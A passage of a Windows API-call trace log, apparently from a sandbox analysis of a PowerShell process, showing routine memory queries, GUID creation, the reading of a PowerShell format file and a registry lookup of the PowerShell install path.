	[0427.479] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.480] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd8b0d15f, Data2=0xbe41, Data3=0x4b9d, Data4=([0]=0x87, [1]=0xec, [2]=0x38, [3]=0xdd, [4]=0x31, [5]=0x9b, [6]=0x65, [7]=0xbe))) returned 0x0
	[0427.481] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.481] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18bb80, lpBuffer=0x18ca40, dwLength=0x30 | out: lpBuffer=0x18ca40*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.482] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6c288843, Data2=0x62f9, Data3=0x4448, Data4=([0]=0xa0, [1]=0x79, [2]=0x85, [3]=0x50, [4]=0x12, [5]=0x72, [6]=0x42, [7]=0xe1))) returned 0x0
	[0427.483] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9adbed35, Data2=0x7f3, Data3=0x43e1, Data4=([0]=0x9d, [1]=0x71, [2]=0x96, [3]=0x3, [4]=0x5d, [5]=0xb5, [6]=0xad, [7]=0x55))) returned 0x0
	[0427.483] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3946bccb, Data2=0x873c, Data3=0x4eb4, Data4=([0]=0x8d, [1]=0xe, [2]=0xd7, [3]=0x4e, [4]=0xf8, [5]=0x3d, [6]=0xaf, [7]=0xb7))) returned 0x0
	[0427.483] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x65e203fa, Data2=0x6054, Data3=0x492d, Data4=([0]=0xb0, [1]=0x26, [2]=0xa1, [3]=0x98, [4]=0xbb, [5]=0x44, [6]=0xc0, [7]=0xa6))) returned 0x0
	[0427.483] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x5da2fa84, Data2=0x956, Data3=0x4a4b, Data4=([0]=0xa5, [1]=0xf0, [2]=0x8a, [3]=0x3f, [4]=0xec, [5]=0x2a, [6]=0xdc, [7]=0xd2))) returned 0x0
	[0427.483] VirtualQuery (in: lpAddress=0x18bc90, lpBuffer=0x18cb50, dwLength=0x30 | out: lpBuffer=0x18cb50*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.483] VirtualQuery (in: lpAddress=0x18bd20, lpBuffer=0x18cbe0, dwLength=0x30 | out: lpBuffer=0x18cbe0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.484] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7a4ce61e, Data2=0x1282, Data3=0x4e66, Data4=([0]=0x92, [1]=0xca, [2]=0x56, [3]=0x18, [4]=0x14, [5]=0xa, [6]=0x2c, [7]=0x94))) returned 0x0
	[0427.484] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2e80782c, Data2=0x969e, Data3=0x49d9, Data4=([0]=0x8b, [1]=0x20, [2]=0x20, [3]=0xd5, [4]=0x47, [5]=0x30, [6]=0x8e, [7]=0xeb))) returned 0x0
	[0427.484] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7630e9db, Data2=0xacd5, Data3=0x4125, Data4=([0]=0xba, [1]=0xef, [2]=0xfa, [3]=0x2e, [4]=0xd3, [5]=0x40, [6]=0xe3, [7]=0x36))) returned 0x0
	[0427.484] SetErrorMode (uMode=0x1) returned 0x1
	[0427.484] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0427.484] SetErrorMode (uMode=0x1) returned 0x1
	[0427.484] GetFileType (hFile=0x1c4) returned 0x1
	[0427.484] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.485] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.485] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.486] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.487] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0xe67, lpOverlapped=0x0) returned 1
	[0427.488] ReadFile (in: hFile=0x1c4, lpBuffer=0x30511ef, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x30511ef*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.489] ReadFile (in: hFile=0x1c4, lpBuffer=0x3051c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3051c20*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.489] SetErrorMode (uMode=0x1) returned 0x1
	[0427.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0427.489] SetErrorMode (uMode=0x1) returned 0x1
	[0427.489] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0427.489] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0427.489] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0427.489] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0427.489] CoTaskMemFree (pv=0x2a5400) 
	[0427.489] RegCloseKey (hKey=0x1c4) returned 0x0
	[0427.773] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6b230e4, Data2=0x1fb4, Data3=0x49e1, Data4=([0]=0x90, [1]=0xd6, [2]=0x62, [3]=0x4f, [4]=0x6f, [5]=0x94, [6]=0x62, [7]=0xf7))) returned 0x0
	[0427.773] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x43efa450, Data2=0x502b, Data3=0x488c, Data4=([0]=0x94, [1]=0x83, [2]=0x9e, [3]=0x53, [4]=0xf8, [5]=0xaa, [6]=0x5e, [7]=0xe7))) returned 0x0
	[0427.773] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x4a9dec5, Data2=0xbc3c, Data3=0x4883, Data4=([0]=0x94, [1]=0x64, [2]=0x8, [3]=0x9, [4]=0x15, [5]=0x6b, [6]=0xeb, [7]=0x88))) returned 0x0
	[0427.773] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xc6be4e99, Data2=0x9d21, Data3=0x4a7f, Data4=([0]=0x99, [1]=0x34, [2]=0x66, [3]=0x2e, [4]=0x87, [5]=0x9b, [6]=0x5a, [7]=0x8))) returned 0x0
	[0427.773] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x958a0b43, Data2=0x2598, Data3=0x4fc0, Data4=([0]=0xb2, [1]=0xef, [2]=0x5e, [3]=0x6b, [4]=0xe9, [5]=0xe4, [6]=0xa9, [7]=0x5))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xa88609ab, Data2=0x446, Data3=0x4863, Data4=([0]=0xa1, [1]=0x63, [2]=0x7d, [3]=0xbb, [4]=0xfc, [5]=0xf6, [6]=0x32, [7]=0xcd))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x38ab900e, Data2=0xb95a, Data3=0x4d90, Data4=([0]=0x9b, [1]=0x19, [2]=0xf6, [3]=0xe1, [4]=0xd8, [5]=0xe9, [6]=0x7b, [7]=0xea))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe54c449, Data2=0xb5b0, Data3=0x4a8d, Data4=([0]=0xb7, [1]=0xfe, [2]=0xa5, [3]=0x49, [4]=0xbf, [5]=0x4b, [6]=0xa8, [7]=0x32))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x581f62c, Data2=0xf176, Data3=0x4505, Data4=([0]=0x87, [1]=0xd3, [2]=0xb2, [3]=0x22, [4]=0x2, [5]=0xb1, [6]=0xea, [7]=0x9f))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x83dbf8ca, Data2=0xeaf2, Data3=0x4039, Data4=([0]=0x82, [1]=0x45, [2]=0x3d, [3]=0x6e, [4]=0x4d, [5]=0xaf, [6]=0x34, [7]=0x39))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x1cda29a5, Data2=0x8ac8, Data3=0x4846, Data4=([0]=0xbc, [1]=0x59, [2]=0x97, [3]=0x42, [4]=0x73, [5]=0x2b, [6]=0x92, [7]=0x37))) returned 0x0
	[0427.774] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x8bb0e43d, Data2=0xfd0d, Data3=0x4022, Data4=([0]=0xbb, [1]=0x6, [2]=0x53, [3]=0x56, [4]=0x7, [5]=0xa8, [6]=0x5d, [7]=0x7d))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2ec97d27, Data2=0x657, Data3=0x4c9e, Data4=([0]=0xb0, [1]=0x54, [2]=0x10, [3]=0x8b, [4]=0xfb, [5]=0xf1, [6]=0xbd, [7]=0xe7))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe5baadbb, Data2=0xa27d, Data3=0x41c6, Data4=([0]=0xb7, [1]=0xdf, [2]=0xf2, [3]=0xab, [4]=0xde, [5]=0x85, [6]=0x45, [7]=0x76))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x4cf31737, Data2=0x3968, Data3=0x4a41, Data4=([0]=0xb6, [1]=0x88, [2]=0xaf, [3]=0x80, [4]=0x7d, [5]=0xee, [6]=0x53, [7]=0x43))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2edd56f1, Data2=0x4994, Data3=0x4882, Data4=([0]=0xb6, [1]=0x19, [2]=0x81, [3]=0xc1, [4]=0xe6, [5]=0x8c, [6]=0xcf, [7]=0x49))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x5c1233a2, Data2=0xa25d, Data3=0x44a4, Data4=([0]=0x9f, [1]=0xbf, [2]=0xcb, [3]=0x59, [4]=0x5a, [5]=0xfb, [6]=0x76, [7]=0x5d))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe8775efe, Data2=0xada3, Data3=0x4859, Data4=([0]=0xa9, [1]=0x90, [2]=0x98, [3]=0xb8, [4]=0x76, [5]=0xb7, [6]=0x6d, [7]=0xe9))) returned 0x0
	[0427.775] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xb133f2e, Data2=0xe61f, Data3=0x49e4, Data4=([0]=0xa9, [1]=0x6, [2]=0x8f, [3]=0xf7, [4]=0x3d, [5]=0x14, [6]=0xc1, [7]=0x9))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xfd617022, Data2=0x45f7, Data3=0x4dc8, Data4=([0]=0x9c, [1]=0x96, [2]=0x28, [3]=0xa2, [4]=0xe8, [5]=0xf9, [6]=0x2c, [7]=0x62))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x4e4745b4, Data2=0x92d9, Data3=0x4d3c, Data4=([0]=0xb8, [1]=0xab, [2]=0x68, [3]=0x72, [4]=0xcd, [5]=0xf4, [6]=0xc3, [7]=0x8f))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x848ae1c5, Data2=0xfa85, Data3=0x4824, Data4=([0]=0xb2, [1]=0xd7, [2]=0x2f, [3]=0xf1, [4]=0xa8, [5]=0x19, [6]=0x63, [7]=0xb3))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xaf06ac71, Data2=0x120e, Data3=0x4e78, Data4=([0]=0xbb, [1]=0x8d, [2]=0xf5, [3]=0x2d, [4]=0x70, [5]=0x59, [6]=0xc9, [7]=0xf1))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9c15a72c, Data2=0xc01e, Data3=0x48dd, Data4=([0]=0x81, [1]=0x7a, [2]=0x96, [3]=0x53, [4]=0x5b, [5]=0x3d, [6]=0x5d, [7]=0x12))) returned 0x0
	[0427.776] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd4dade8c, Data2=0xd0a7, Data3=0x45f1, Data4=([0]=0xab, [1]=0x4e, [2]=0x7, [3]=0x85, [4]=0x2e, [5]=0xa6, [6]=0xf8, [7]=0x6a))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6f806b62, Data2=0xa71f, Data3=0x4094, Data4=([0]=0xae, [1]=0xbc, [2]=0xae, [3]=0xb3, [4]=0x6d, [5]=0x81, [6]=0xb4, [7]=0x3))) returned 0x0
